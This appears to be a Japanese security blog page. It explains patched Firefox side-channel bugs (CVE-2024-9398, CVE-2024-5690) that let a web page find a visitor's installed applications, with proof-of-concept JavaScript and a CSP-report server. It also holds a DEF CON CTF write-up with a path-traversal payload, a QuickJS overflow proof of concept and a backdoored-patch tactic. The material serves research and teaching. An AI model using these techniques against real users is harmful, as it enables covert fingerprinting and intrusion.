本記事では、AVTOKYO2024にて発表した「Mozilla FirefoxのInformation disclosureの0-day脆弱性(CVE-2024-9398, CVE-2024-5690)」について解説します。本記事で解説する脆弱性によって、本来ブラウザにより秘匿されるべきURLプロトコルハンドラの設定の有無がページ経由で漏洩します。結果として、攻撃者はターゲットユーザマシンにインストールされている様々なアプリケーションを特定できます。

Mozilla Firefox 0-day: Browser Side-Channel Attack to Leak Installed Applications

注意
本脆弱性の解説はMozillaより許可を得て公開しています。本記事は、セキュリティ研究と教育を目的としており、記事内の情報を不適切な形で利用した如何なる損害についても、責任を負いません。

 

URLプロトコルハンドラとは

URLプロトコルハンドラとは、ブラウザやOSが特定のプロトコルスキーム(例えば、http,ftp,mailto)に基づいて、URLをどのように処理するかを定義する仕組みです。URLにアクセスした際に、どのようなアプリケーションを起動するかを決定するために使用されます。具体例としては、mailto:satoki@example.comのようなリンクをクリックした際にデフォルトのメールクライアントが開くのは、URLプロトコルハンドラがmailtoスキームのURLを取り扱うように設定されているためです。

一般的なスキームはIANAに登録されており、その他にもアプリケーションが独自に設定したカスタムスキームも存在します。以下にスキームの例を示します。

スキーム 機能の概要
http WebページへのアクセスにHTTPプロトコルを使用する
javascript Webページ内でJavaScriptを実行する
file ファイルシステムにアクセスする
steam Steamプラットフォーム内で特定の機能を呼び出す
zoommtg Zoomで会議を開始または会議に参加する
example スキームの例示に用いる

スキームを用いたアプリケーションの起動時には、ユーザへ確認を促すダイアログが表示されます。以下にsteamスキームを開いた際の例を示します。

アプリケーションはURLプロトコルハンドラへ独自のカスタムスキームを設定できます。詳細は述べませんが、WindowsではレジストリにURL Protocolキーと実行ファイルのパスおよび実行パラメータを登録することで、カスタムスキームが利用可能となります。

 

URLプロトコルハンドラの漏洩リスク

URLプロトコルハンドラの設定の有無が攻撃者に漏洩した場合に、どのようなリスクがあるでしょうか。FortiGuard Labs Threat Research Reportでは、漏洩した場合の影響を以下のようにまとめています。

Identifying communication channels: By listing the handlers an attacker can get a hint to what platforms he may use for reaching the targeted user. For instance, detecting social applications such as Slack, Skype, WhatsApp or Telegram may be used for communicating with the target.

General reconnaissance: A wide range of applications nowadays uses custom URL handlers and can be detected using this vulnerability. Some examples: music players, IDE, office applications, crypto-mining, browsers, mail applications, antivirus, video conferencing, virtualizations, database clients, version control clients, chat clients, voice conference apps, shared storages

Pre-exploitation detection: Exploit kits may leverage this information in order to identify if a potentially vulnerable application is present without exposing the vulnerability itself.

Detecting Security solutions: Many security solutions such as AV products register protocol handlers whose presence can be exposed by leveraging the vulnerabilities because they have custom protocol handlers installed. Attackers may use this to further customize their attack to be able to circumvent any protection mechanism set by those security solutions.

User Fingerprinting: reading what protocol handlers exist on a system may also be used in order to improve browser/user fingerprinting algorithms.

URLプロトコルハンドラの設定の有無が漏洩した場合、攻撃者が存在するハンドラを列挙できます。結果として、ターゲットユーザのマシンにインストールされた様々なアプリケーションを確認することができます。具体的には、slackスキームが存在すればSlackがインストールされており、skypeスキームが存在すればSkypeがインストールされていると分かります。

特定のアプリケーションのインストールの有無が露見した場合にどのようなリスクがあるでしょうか。ターゲットユーザが日常的に使用しているコミュニケーションツールが判明した場合には、攻撃者がアカウントを調査し接触を図る手掛かりになります。インストールされているアプリの種類から、ターゲットの属性を推測できます。金融系のアプリが分かればフィッシングの精度向上にも寄与します。ターゲットをWebサイト内でトラッキングする際のフィンガープリンティングにも使用できます。

ターゲットユーザが導入しているセキュリティソフトを特定し、検知回避など次の攻撃の足掛かりとする可能性もあります。以下にFortiGuard LabsのRotem Kerner氏の報告にある、攻撃者にとって有用なカスタムスキームの例を引用します。2020年の報告であるため、現在のサポート状況は不明です。

スキーム ベンダ名
GDataGDATAToastNews GData
malwarebytes MalwareBytes
avastpam Avast
vizorwebs, tmtb, titanium, vizorweb TrendMicro
bdlaunch BitDefender


imgタグのサイズをオラクルとした既知の脆弱性

Mozilla Firefox 82未満では、Rotem Kerner氏よりURLプロトコルハンドラの漏洩の脆弱性が報告されています。この脆弱性は、CVE-2020-15680として採番されており、Mozilla Foundation Security Advisoryに記載されたImpactはmoderateとされます。

CVE-2020-15680: Presence of external protocol handlers could be determined through image tags

彼はimgタグのsrcにカスタムスキームを指定した場合の挙動差を発見しました。以下のようなimgタグを二つ用意します。

<img src="ms-settings://satoki">
<img src="satoki://satoki">

ms-settingsスキームにはWindows設定アプリが起動するよう設定されており、satokiスキームには何も設定されていません。開発者ツールを開き、各imgタグのサイズを確認します。

ms-settings://satokiのimgタグ

satoki://satokiのimgタグ

どちらも画像としての読み込みが失敗しますが、スタイルのサイズが異なっていることが分かります。Firefoxは画像の正常な読み込みに失敗した場合に、壊れた画像を示すアイコンを表示します。このアイコンのサイズが24×24です。ms-settingsスキームではアイコンが表示されています。一方、satokiスキームのようにハンドラが設定されていないスキームではアイコンが表示されないため、サイズは0×0となります。

このサイズの差をオラクル(未知のものを推測する手掛かりとなる既知の情報)とすることで、攻撃者はURLプロトコルハンドラの設定の有無を判別することができます。JavaScriptで大量のimgタグを生成し、各スタイルのwidthが24と一致するか検証することで、サイトの運営者は訪問者のコンピュータにどのようなURLプロトコルハンドラが設定されているかを知ることができます。

 

window.openのエラーをオラクルとした手法 (CVE-2024-9398)

今回、著者が発見した脆弱性の1件目です。本脆弱性では、window.openの戻り値へのアクセス時に発生するエラーの有無をオラクルとして、URLプロトコルハンドラの設定の有無を取得できます。ターゲットユーザがポップアップを許可する必要があるため、危険性は低くなっています。

CVE-2024-9398: External protocol handlers could be enumerated via popups

脆弱性調査を行う中でwindow.openでカスタムスキームを開いた際に、異なるページ表示が行われることを発見しました。開発者ツールのコンソールを開き、以下のJavaScriptを実行します。

open01 = window.open("ms-settings://satoki");
open02 = window.open("satoki://satoki");

ポップアップを許可すると、以下のような二つのページが新しくオープンされます。

ms-settings://satokiで開かれるページ

satoki://satokiで開かれるページ

ms-settingsスキームではアプリケーションを開くため、ユーザへ確認を促すダイアログが表示されています。一方、satokiスキームのようにハンドラが設定されていないスキームでは、ページ読み込みエラーが表示されています。これは開くアプリケーションが存在しないために起こります。この差を知ることはできないでしょうか。

window.openを実行した開発者ツールのコンソールに戻って、返り値のdocumentオブジェクトにアクセスしてみましょう。 

ページ読み込みエラーとなったページのdocumentオブジェクトへのアクセスが、拒否されてエラーとなっています。この挙動はopen02[0]のような配列アクセスでも同様となります。このエラーをキャッチすることで、オラクルとして用いることができます。他にも以下のようにframesの差を用いたオラクルも可能です。

ポップアップが許可されているという条件のもとですが、攻撃者はwindow.openを用いてカスタムスキームを大量に開き、各documentオブジェクトへのアクセスがエラーとなるか検証します。この結果により、攻撃者はURLプロトコルハンドラの設定の有無を判別できます。不自然に開いたページは、最後にwindow.closeですべて閉じることで処理できます。

window.historyの変化をオラクルとした手法

先ほどまでのエラーをオラクルとした手法との違いはほとんどありませんが、Historyの興味深いふるまいを利用した手法も発見しています。CTFなどではよく知られている、History Length経由でユーザの情報を取得するテクニックを応用します。本手法はwindow.openのエラーをオラクルとした手法 (CVE-2024-9398)に含めて報告しています。window.openで開くまでは同様となりますが、window.locationを更新した際のwindow.historyの変化を利用します。

ハンドラが設定されているms-settings://satokiをwindow.openした後に、window.locationをフラグメント付きのms-settings://satoki#satokiに変更し、その後に再度window.locationをabout:blankに変更します。するとwindow.history.lengthは1となります。どうやらwindow.locationの更新ではHistoryが増加しないようです。

一方、ハンドラが設定されていないスキームsatoki://satokiをwindow.openし、window.locationをsatoki://satoki#satokiabout:blankと二度変更します。すると、window.history.lengthへアクセスが可能となり、window.history.lengthは2となります。こちらはHistoryが増加するようです。

これらの挙動をまとめると、window.locationの更新ではハンドラが設定されていないスキームのみ、Historyが増加します。このwindow.historyの変化をオラクルとして、攻撃者はURLプロトコルハンドラの設定の有無を判別できます。

iframe.contentWindow.history.lengthのエラーをオラクルとした手法

window.openで新しいページを開くためには、ポップアップの許可が必要となります。ポップアップはターゲットユーザが意図的に許可しなければならず、ユーザのアクションが必要となるためステルス性が低下します。ターゲットユーザがポップアップを許可する必要のない手法も発見しており、window.openのエラーをオラクルとした手法 (CVE-2024-9398)に含めて報告しています。本手法はステルス性を向上させるため、カスタムスキームごとにiframeを作成し、iframe.contentWindow.history.lengthへアクセスした際のエラーの有無を利用します。

ハンドラが設定されているms-settings://satokiとハンドラが設定されていないsatoki://satokiの二つのiframeを作成します。開発者ツールのコンソールを開き、以下のJavaScriptを実行します。注意点として、Firefoxではある程度の間隔をあけなければiframeを連続して開くことができない制約があります。

iframe01 = document.createElement("iframe");
document.body.appendChild(iframe01);
iframe01.sandbox="";
iframe01.src = "ms-settings://satoki";
// sleep 10~20s
iframe02 = document.createElement("iframe");
document.body.appendChild(iframe02);
iframe02.sandbox="";
iframe02.src = "satoki://satoki";

すると以下のような二つのiframeが新しく開かれます。ここではsandbox属性により、ユーザへ確認を促すダイアログを表示させないテクニックも用いています。

ms-settingsスキームのようにハンドラが設定されている場合は空白のページ、satokiスキームのようにハンドラが設定されていない場合はページ読み込みエラーが表示されています。これはwindow.openと同様です。ここで各iframeのcontentWindow.history.lengthへアクセスしてみましょう。

satokiスキームでのcontentWindow.history.lengthのアクセスが、拒否されてエラーとなっています。この挙動はabout:blankでiframeを作成した後に、srcを指定することで発生します。このエラーをキャッチすることで、オラクルとして用いることができます。

攻撃者は指定した間隔ごとにiframeでカスタムスキームを開き、contentWindow.history.lengthへのアクセスがエラーとなるか検証します。結果により、攻撃者はURLプロトコルハンドラの設定の有無を判別できます。また、ポップアップが一度でも許可されているという条件のもとではiframeを連続して開くことができるため、window.openよりも強力な手法と言えます。

 

imgタグのonerror発火時間をオラクルとした手法 (CVE-2024-5690)

今回、著者が発見した脆弱性の2件目です。本脆弱性では、imgタグの生成から読み込みエラーイベント(onerror)が発火するまでの時間をオラクルとして、URLプロトコルハンドラの設定の有無を取得できます。ターゲットユーザのアクションは不要です。

CVE-2024-5690: External protocol handlers leaked by timing attack

脆弱性調査を行う中で、imgタグにカスタムスキームを設定した際におけるイベントの発火について検証を行いました。イベントは以下のようにimgタグに設定できます。

<img src="ms-settings://satoki" onerror="alert('ms-settings')">
<img src="satoki://satoki" onerror="alert('satoki')">

幸いなことにイベントの発火はハンドラの設定の有無とは無関係に行われることが分かりました。そこで、イベントが発火するまでの時間を計測してみることにしました。開発者ツールのコンソールを開き、以下のJavaScript関数を作成します。

async function measureLoadTime(ph, numberOfTrials) {
    let totalTime = 0;
    for (let i = 0; i < numberOfTrials; i++) {
        const startTime = performance.now();
        await new Promise(resolve => {
            const img = document.createElement("img");
            document.body.appendChild(img);
            img.onload = img.onerror = function() {
                const endTime = performance.now();
                totalTime += endTime - startTime;
                img.parentNode.removeChild(img);
                resolve();
            };
            img.src = ph;
        });
    }
    return totalTime;
}

この関数では、初めにimgタグを生成します。次に、受け渡された第一引数をimgタグのsrcに設定します。その後に、onloadイベント(読み込み完了)またはonerrorイベント(読み込み失敗)が発火するまでの時間を計測します。さらに、この一連の計測を第二引数の回数だけ繰り返し実行し、累積した時間を返します。つまりmeasureLoadTime("satoki://satoki", 10000);を呼び出すと、satoki://satokiのonerrorイベントが発火するまでの時間を10000回分計測し、累積した時間を返します。この関数を用いて以下のJavaScriptを実行し、カスタムスキームに対し10000回分の時間を計測します。

measureLoadTime("ms-settings://satoki", 10000).then(time => console.log(time));
measureLoadTime("satoki://satoki", 10000).then(time => console.log(time));

順番を入れ替え、複数回行った結果は以下の通りとなりました。

ms-settingsスキームのイベントが発火するまでの時間に比べ、satokiスキームのイベントの発火が倍ほど早いことが分かります。様々なカスタムスキームで検証した結果、ハンドラが設定されているスキームはイベントの発火が遅延していることが判明しました。この遅延をオラクルとして用いることができます。

攻撃者はJavaScriptで大量のimgタグを生成し、各タグのイベント発火までにかかった時間を計測します。速度は環境により異なりますが、ハンドラが設定されていないスキームの値をあらかじめ保持しておき、比較することでURLプロトコルハンドラの設定の有無を判別できます。

 

CSPのreport-uriディレクティブリクエストをオラクルとした手法 (CVE-2024-5690:DUPLICATE)

今回、著者が発見した脆弱性の3件目です。imgタグのonerror発火時間をオラクルとした手法 (CVE-2024-5690)よりも前に報告していましたが、修正が同様の箇所で済んだためDUPLICATEとなりました。タイミングを調整して上手く報告していれば認定されたと感じています。本脆弱性では、imgタグの読み込みをCSP(Content Security Policy)でブロックした際の振る舞いを利用します。CSPのreport-uriディレクティブに設定したURLへのリクエストをオラクルとして、URLプロトコルハンドラの設定の有無を取得できます。ターゲットユーザのアクションは不要です。

脆弱性調査を行う中で、imgタグをCSPでブロックした際の挙動について検証を行いました。CSPをimg-src 'self'に設定したページにおいて、ブロックしたimgタグのスタイルに差が生じればそれを利用することができます。カスタムスキームはselfでないため、すべてが一律でブロックされると予想されます。以下のようなHTMLを作成して調査します。

<html>
    <head>
        <meta http-equiv="Content-Security-Policy" content="img-src 'self';">
    </head>
    <body>
        <img src="ms-settings://satoki">
        <img src="satoki://satoki">
    </body>
</html>

開発者ツールでimgタグのスタイルなどを調査していると、コンソールに以下のような奇妙な表示があることに気付きました。

imgタグが二つ含まれているにもかかわらず、CSPによるブロックがms-settingsスキームのみとなっています。これはimgタグの順番を変更しても同様でした。つまり、ハンドラが設定されているスキームはCSPによりリソースの読み込みがブロックされますが、設定されていないスキームはリソースとしての読み込み自体が発生していないと考えられます。読み込み自体が発生していないため、CSPにはブロックされません。このようなCSPでのブロックの有無を外部から観測できるでしょうか。

ここで、CSPには違反(ブロック)を報告するディレクティブであるreport-uriが設定可能である事を思い出しました。Content-Security-Policy: report-uri http://localhost;のように設定することにより、ページ内のコンテンツでCSP違反が発生した際に、ブラウザがhttp://localhostへ違反内容をJSONでPOSTします。report-uriはmetaタグでは指定できないため、以下のように簡易的なサーバプログラムを用意します。

from flask import Flask, request, make_response

app = Flask(__name__)

@app.route("/")
def index():
    response = make_response(
        f"""
<html>
    <body>
        <img src="ms-settings://satoki">
        <img src="satoki://satoki">
    </body>
</html>
"""
    )
    response.headers["Content-Security-Policy"] = (
        f"img-src 'self'; report-uri http://localhost:5555/recv;"
    )
    return response

@app.route("/recv", methods=["POST"])
def recv():
    print(request.get_data().decode("utf-8"))
    return "OK"

if __name__ == "__main__":
    app.run(debug=False, host="0.0.0.0", port=5555)

この簡易的なサーバプログラムはポート5555でアクセスを待ち受け、imgタグを二つ表示します。imgタグにはCSPでimg-src 'self';という制限がかかっています。また、CSPの違反の報告先はreport-uri http://localhost:5555/recv;と指定されています。報告を受け取るパスの/recvでは、受け取ったCSP違反の報告をprintしています。このサーバのページを開いたときにprintされたJSONは以下の通りでした。

{
  "csp-report": {
    "blocked-uri": "ms-settings",
    "column-number": 1,
    "disposition": "enforce",
    "document-uri": "http://localhost:5555/",
    "effective-directive": "img-src",
    "original-policy": "img-src 'self'; report-uri http://localhost:5555/recv",
    "referrer": "",
    "status-code": 200,
    "violated-directive": "img-src"
  }
}

blocked-uriにブロックされたms-settingsスキームが表示されていることが分かります。このリクエストをオラクルとして用いることができます。同様にscriptタグをscript-srcディレクティブで制限した場合や、audioまたはvideoタグをmedia-srcディレクティブで制限した際のリクエストもオラクルとして用いることができます。

攻撃者はあらかじめimgタグを大量にしたページを用意します。ページのCSPはimgタグを必ずブロックするものとし、report-uriディレクティブに攻撃者自身のサーバを設定します。攻撃者は受け取ったCSP違反の報告のblocked-uriの内容から、URLプロトコルハンドラの設定の有無を判別できます。

 

修正

CVE-2024-9398

プロトコルハンドラの設定が有る場合にはabout:blankでポップアップが表示されており、プロトコルハンドラの設定が無い場合にはネットワークエラーページが表示されていました。この差によって、プロパティへのアクセス違反の有無が生じていることが原因でした。プロトコルハンドラの設定が無い場合にもabout:blankを用いることで、差をなくす修正が行われました。

CVE-2024-5690

プロトコルハンドラの設定の有無のチェックが、CSPを含むセキュリティチェックよりも前に行われていたことが原因でした。結果として、エラーイベントが発火するまでの時間にも差が出ています。プロトコルハンドラの設定が無い場合に、早期にリターンを行う機能を削除する修正が行われました。また、DUPLICATEとなった脆弱性も同様の修正で解消されています。

 

おわりに

本記事では、URLプロトコルハンドラの設定の有無がページ経由で漏洩する脆弱性について解説しました。一見無害に思えるURLプロトコルハンドラの設定情報でも、攻撃者視点では悪用手法が見いだせる可能性があります。ブラウザの最適化など実装の違いによる挙動の差はしばしば発生します。セキュリティエンジニアは常にオフェンシブな視点を持ち、無害と思える情報にも疑いの目を向けることが求められます。

リチェルカセキュリティではWeb分野での未知の攻撃を日々研究し、お客様へのソリューションの提供に役立てています。発見した脆弱性の報告はもちろんのこと、登壇資料作成の業務時間への算入や、平日の登壇に対する特別休暇の付与など、外部発表などを支援する登壇支援制度も設けられています。

有名ソフトウェアの0-day脆弱性調査をはじめ、研究開発など若い才能にお任せしたい業務がたくさんあります。この記事を読んで当社の取り組みにご興味を持った方は、ぜひカジュアル面談にお申し込みください。

Friday, November 1, 2024

DEF CON 32 CTF Finals 参加記&Write-Up

著者:Arata, iwancof, iwashiira, satoki

はじめに

アメリカのラスベガスで世界最大級のハッキングイベント DEF CON 32 が開催されました。このイベントでは、毎年 Capture The Flag (CTF) と呼ばれるハッキング大会の決勝戦 (Finals) が行われます。本記事では、弊社メンバーが Finals で担当した問題、各ブースの様子、そして現地での生活をお伝えします。昨年の様子は こちらの記事 からご覧いただけます。

2024年度は8月8日から11日の期間で、例年と異なる会場 Las Vegas Convention Center West Hall で開催されました。弊社社員・アルバイトは国際チーム「Blue Water」のメンバーとして Finals に出場しました。

DEF CON 32 会場

 

リチェルカセキュリティには、現役で CTF に取り組んでいる社員・アルバイトが多数在籍しています。CTF は多種多様な前提、制約、技術領域に触れる機会になり、業務の実行能力向上にも繋がります。弊社メンバーの自己研鑽の一環として、希望者全員の渡航費や宿泊費などを全額サポートしました。

DEF CON CTF 32 Finals

DEF CON では、Village と呼ばれるブース単位でイベントが開催されています。各 Village ではそれぞれのテーマに沿ったコンテストや大小様々な CTF を開催しています。それら CTF の中で、最も古く難しいと言われるものが DEF CON 本体のイベント DEF CON CTF です。今年は、予選大会を突破した12のチームが世界各地から集まりました。

DEF CON CTF 32

DEF CON CTF Finals の競技形式

本年度の DEF CON CTF は例年と変わらず、Nautilus Institute が運営しています。Finals では Attack&Defense (A&D) と、King of the Hill (KotH) と呼ばれる2種類の競技形式でそれぞれ問題が出題され、合計のスコアを競いました。

競技に取り組む弊社社員たち

A&D では、各チームにセキュリティ上の問題があるシステムが配布され、それを稼働させながらお互いに攻撃と防御を行います。攻撃は、セキュリティ上の弱点を利用して他チームのシステムに侵入し、隠された情報 (フラグ) を手に入れることが目標です。防御は、自チームのシステムを調査し、システムの脆弱な箇所を特定して修正作業を行います。もちろん修正中にシステムを停止させることは許されません。

KotH では、決められた条件の中でサーバーを占有し続けたり、最も高得点のスコアを取り続け、”King”となることでポイントを獲得できます。効率的にスコアを稼ぐ方法を探さなければなりません。

 

[KotH] codewords

今年の決勝戦では、 WASM のリバースエンジニアリングを主題とした「codewords」という KotH 形式の問題が出題されました。この問題では、まず各チームが次の2つの関数をもつプログラムを作成します。

  • uint64_t generate(uint32_t round_num)
    • ラウンド番号を引数に受け取り、64ビット整数 (codeword) を返す
    • 返すcodewordはチームが任意に決めてよい
  • uint64_t verify(uint32_t round_num, uint64_t codeword)
    • ラウンド番号と codeword を引数に受け取り、正しい codeword であれば1を、そうでなければ0を返す

そして作成したプログラムをサーバーに提出すると、他のチームがverifyを呼び出せるようになります。例として、デフォルトで使用されていたプログラムを以下に示します。

#include <stdint.h>

uint64_t generate(uint32_t round_num) {
    uint64_t a = 0x4142434445464748 + round_num;
    return a;
}

uint64_t verify(uint32_t round_num, uint64_t codeword) {
    uint64_t a = 0x4142434445464748 + round_num;
    if (a != codeword) {
        return 0;
    }
    return 1;
}

競技においては、各チームがこのプログラムをベースに攻撃と防御を行っていきます。

攻撃

攻撃側は他チームのcodewordを特定してverifyに1を返させることができれば得点を獲得できます。しかし、何も手がかりがなければcodewordを特定することは困難です。そこで、他チームにはverifyを WASM にコンパイルした verify.wasm が公開されます。この公開された verify.wasm をリバースエンジニアリングすることで、他チームのcodewordを特定することが目的です。したがって、攻撃側にはWASMを迅速にリバースエンジニアリングし、他チームのcodewordを特定することが求められます。

防御

防御側は、自分のcodewordを特定されないようにすることが目的です。verifyは他チームに公開されますが、一方でgenerateは公開されません。そのため、codewordを生成するgenerateのアルゴリズムが推測されにくくなるように verifyを作成する必要があります。ただし、generateおよびverifyが実行できる命令数には制限があります。つまり、計算量が一定以下のアルゴリズムを用いつつ、他チームに codeword を特定されないようにすることが求められます。

戦況の推移

問題が公開された2日目以降、次のような時系列で競技が進みました。

  • 8/10 10:00 2日目開始
  • 8/10 12:40 問題が公開される
  • 8/10 12:50 各チームが四則演算・余剰などを使ったアルゴリズムへの変更を進める
  • 8/10 14:30 ナップサック暗号を使用するチームが登場
  • 8/10 14:40 ハッシュ関数を使用し、codeword を定数とするチームが登場
  • 8/10 15:30 過半数のチームがハッシュ関数を使ったアルゴリズムへ変更
  • 8/10 18:00 2日目終了
  • 8/11 10:00 3日目開始
  • 8/11 10:10 いくつかのチームが定数を変更、あるいはハッシュ関数を使ったアルゴリズムへ変更
  • 8/11 13:00 3日目終了(競技終了)

所感

全体として、2日目にハッシュ関数を使ったチームが登場して以降多くのチームが同様の方針をとっており、アルゴリズム面で大きな変化はなかったように感じています。以下が他チームの verify.wasm を wasm-decompile でデコンパイルしたコードです。

export function verify(round_num:int, codeword:long):long {
  var h:int;
  var c:int = i32_wrap_i64(codeword >> 32L);
  var d:int = i32_wrap_i64(codeword);
  var e:int = -559038737;
  var f:int = -889275714;
  var g:int = 26;
  loop L_a {
    f = ((e ^ (h = f) << 2) ^ (h << 1 & h << 8)) ^ d;
    d = d * c ^ -1163005939;
    e = h;
    g = g + -1;
    if (g) continue L_a;
  }
  return i64_extend_i32_u(
           (i64_extend_i32_u(f) << 32L | i64_extend_i32_u(h)) ==
           -6656796192791513755L);
}

そのほか、我々のチームでは angr を使用した自動ソルバーなどが作成されており、攻守ともにチームの個性が垣間見える、興味深い問題でした。

 

 [A&D] helium

次に、A&D 形式の「helium」という問題について解説します。この問題の問題ファイルは競技1日目終了時に配布され、実際のサービスは競技2日目の全3時間のみ公開されていました。

配布されたバイナリは、libhydrogen というクリプトのライブラリを使って通信するプログラムでした。シンボル情報が stripされたバイナリなので、各アドレスの関数のシンボルを特定する必要があります。

関数のシンボルの特定に使用する情報は大まかに以下の通りです。

  • 特定の文字列への参照
    • 例: Noise_KK_hydro1 という文字列への参照があるので、 hydro_kx_kk_1()
  • どのような関数から呼ばれているか、どのような関数を呼んでいるか
    • 例: hydro_kx_kk_1() の中で1番目に呼ばれているので、 hydro_kx_init_state()
  • シンボル付きでコンパイルしたサンプルプログラムとの機械語の類似

シンボル情報の特定は、以下のような Google スプレッドシート上で共有しながら並行して行いました。

このプログラムのコアの部分は FUN_001156ae() に存在しました。この関数の中で呼ばれる様々な関数がインライン展開されている影響で、Ghidra でのデコンパイル結果はC言語のコードにして約56000行と膨れ上がっています。

脆弱性

発見した脆弱性は、FUN_001156ae() のオフセット122069にある/proc/%s/stat という文字列への処理にありました。この処理は、通信の暗号化に関連する処理を終えた後のコード部分に存在しています。以下の画像が、該当部分のコードです。 strstr().. という文字列が存在しているかどうかをチェックし、存在していなければ、文字列を snprintf()%s 部分に代入して path となる文字列を作成し、open しています。open したファイルの中身は後の処理で出力されます。

攻撃

ここでの処理では.. という文字列をチェックしています。これはディレクトリトラバーサルを考慮したものと思われますが、実際には不十分です。

例えば、 /proc/self/cwd のような文字列を path に渡せば、そのプロセスのカレントワーキングディレクトリにアクセスできます。文字列の末尾には /stat が付加されてしまいますが、 snprintf() はバッファから溢れる文字列を書き込まないので、うまく /stat を溢れさせれば flag を open して中身を受け取ることができます。具体的には、/proc/self/cwd////////////flag のように丁度溢れるくらいの /を間に挟むことで、 flag の path を指定できます。

脆弱性の発火まで

この問題の注目ポイントは、攻撃ペイロードの解析が不可能である点です。A&D 形式の問題では防御側の情報として、自チームのサービスに送られてきたパケットキャプチャの pcap ファイルと、各チームのホストしているサービスの Docker イメージを得ることができるようになっていました。

しかし、helium のパケットキャプチャ時に得られる通信は、鍵交換に必要な部分を除いて libhydrogen の正規の方法を用いて暗号化されています。上で解説した脆弱性は復号後のペイロードによって発火するので、通信内容を見て攻撃のメカニズムを把握したり、リプレイ攻撃を行ったりすることができないのです。

つまり、脆弱性を見つけることができていないチームは、自力で解析して見つける他には、攻撃を防御できているチームの Docker イメージのパッチ内容からしか脆弱性を特定できません。また仮に脆弱性を特定できたとしても、攻撃に繋げるまでには、前段の通信内容を暗号化するコード部分と整合する処理を行うクライアントを適切に実装する必要があります。この実装自体も、大変骨の折れる作業で、3時間で完了するのは不可能と言ってよいです。

防御

防御に関しては、 strstr のパース部分をどのようにパッチするか、という一点にかかっています。例えば、 / が含まれないようにチェックするようにすれば防御することが可能です。しかし、他のチームが我々のパッチした Docker イメージをコピーして流用するだけで、我々の Exploit コード自体も防御されてしまいます。そのため、脆弱性をパッチしながらも、Docker イメージに上手いことバックドアを仕込んでおく必要があります。実際、攻撃に対する一時的な緩和策として、他チームの Docker イメージをコピーするという運用を行なっていたチームは複数ありました。バックドアが仮に仕込まれていたとしてもそのチームからの攻撃以外は防御できるはずなので、パッチを当てずに各チームから無防備に集中砲火を受けるよりはマシ、ということなのでしょう。

2日目の開始時点では、我々は strstr にパッチを当てませんでした。また、この時1チームを除いた残りのチームに対して攻撃が刺さっていました。つまり、他のチームは脆弱性を見つけることができておらず、よく分からない通信が行われていることのみ分かっているという状況であると推定できます。仮に脆弱性を見つけてパッチされた場合でも、攻撃に転じるまでにはラグがあるでしょう。つまり、攻撃が刺さらなくなって来たタイミングで strstr にバックドアを仕込んだパッチを適用すれば、他チームからの攻撃に対する防御が間に合うという戦略でした。また、パッチを当てて Docker イメージを更新したタイミングで、残りのチームが我々の Docker イメージをコピーするという緩和策を取るかもしれず、そのチームに対しては他のチームの攻撃が刺さらない一方で我々の攻撃は依然として成功するという状況を作り出せる、という狙いもありました。

結果的には、競技終了1時間前のタイミングでstrstr に対するパッチを適用していました。サービスが公開されていた3時間のうち、2時間はほとんどのチームに攻撃が刺さり続けていたということです。

所感

総括すると、攻撃ペイロードの解析が不可能であり、脆弱性を発火させるような攻撃コードの実装も大変な点から、攻撃と防御ともに難易度の高い問題でした。だからこそ、攻撃に成功していた我々のチームは点数を稼ぐことができました。しかしながら競技後に分かったことですが、 strstr 以外のコード部分へ行っていたパッチにミスがあり、幾分かの Defense ポイントを取りこぼしてしまっていたようです。攻撃ペイロードの解析が不可能であるが故に、攻撃されていることに気づかなかったこともミスが発覚しなかった原因の一つでしょう。

通信内容を暗号化するような A&D 形式の問題は、攻撃に成功した場合のリターンが大きく、取り組む価値が高いかもしれません。

 

[A&D] cloud-cache

heliumと同じく、A&D 形式の「cloud-cache」という問題について解説します。

この問題では、次の3つのファイルが攻撃対象となります。

  • entrypoint.bin
    • ELF 形式の実行ファイル
  • jscache.ko
    • 問題サーバにロードされているカーネルモジュール
  • libquickjs.so
    • QuickJS という JavaScript エンジンのライブラリ

jscache.ko は dmesg の取得やカーネル空間に存在するバッファの表示などの機能を提供し、entrypoint.bin は それらの関数を builtin function として QuickJS に登録しています。 攻撃者は telnet を使って QuickJS の REPL に接続することができ、そこからフラグを取得することが目的です。

この問題には数多くの脆弱性が含まれているため、防御側が忙しい問題でした。

脆弱性

先程も述べた通り、バイナリ中に埋め込まれた脆弱性の数が多く、中には2行でフラグを得ることができるほど自明なものもあったため、ここでは非自明であったものの内の一つを解説します。

entrypoint.bin 内で QuickJS に登録された関数のうち、jsExpandという名前で次の関数が登録されていました。

qjs_add_global_func(ctx,"jsExpand",js_expand,2);
int js_expand(undefined8 param_1,undefined8 param_2,undefined8 param_3,int param_4,long *argv)

{
   long lVar1;
   int iVar2;
   long in_FS_OFFSET;
   int length;
   long local_10;

   local_10 = *(long *)(in_FS_OFFSET + 0x28);
   if (param_4 < 2) {
       fwrite("Error: js_expand requires 2 arguments: <array> <length>\\n",1,0x38,_stderr);
       length = 0;
   }
   else {
       iVar2 = JS_ToInt32(param_1,&length,argv[2],argv[3]);
       if (iVar2 == 0) {
           lVar1 = *argv;
           *(long *)(lVar1 + 0x40) = (long)length;
           **(int **)(lVar1 + 0x20) = length;
       }
       else {
           length = 0;
       }
   }
   if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
       return length;
   }
                                    /* WARNING: Subroutine does not return */
   __stack_chk_fail();
}

この関数の目的は、第一引数に渡された JavaScript の配列オブジェクトの長さを、第二引数に渡された整数に設定することです。しかし、バッファの長さなどのチェックを一切行わず長さを設定しているため、例えば次のようなコードを実行することでバッファオーバーフローが発生します。

let foo = [1.1, 1.1]
let bar = [2.2, 2.2, 2.2, 2.2, 2.2, 2.2]

jsExpand(foo, 20)
console.log(foo)

1.1,1.1,[unsupported type],[unsupported type],[unsupported type],[unsupported type],[unsupported type],[unsupported type],1,join,[unsupported type],1.19251584217e-313,2.2,2.2,2.2,2.2,2.2,[unsupported type],[unsupported type],\\nundefined\\n

この脆弱性の他に、フラグをファイルから読み込みメモリ上に配置する関数が用意されているため、これら2つを組み合わせることでフラグを取得することができます。

防御

以上の脆弱性による攻撃を防ぐため、長さを代入する前に既存のバッファの長さをチェックすることでバッファオーバーフローを防ぐことができます。

Attack&Defence 固有の戦略

ここまでは、Jeopardy 形式の問題と同じような解説でしたが、ここからは A&D 固有の戦略について解説します。

A&D では、相手が脆弱性に気が付きパッチを当ててしまうより先にその脆弱性を利用してフラグを取得することが重要です。その一方で、すべての脆弱性を相手より先に見つけるのは困難なため、自分が受けた攻撃を解析しこれ以上の失点が発生しないようにするという戦略が考えられます。

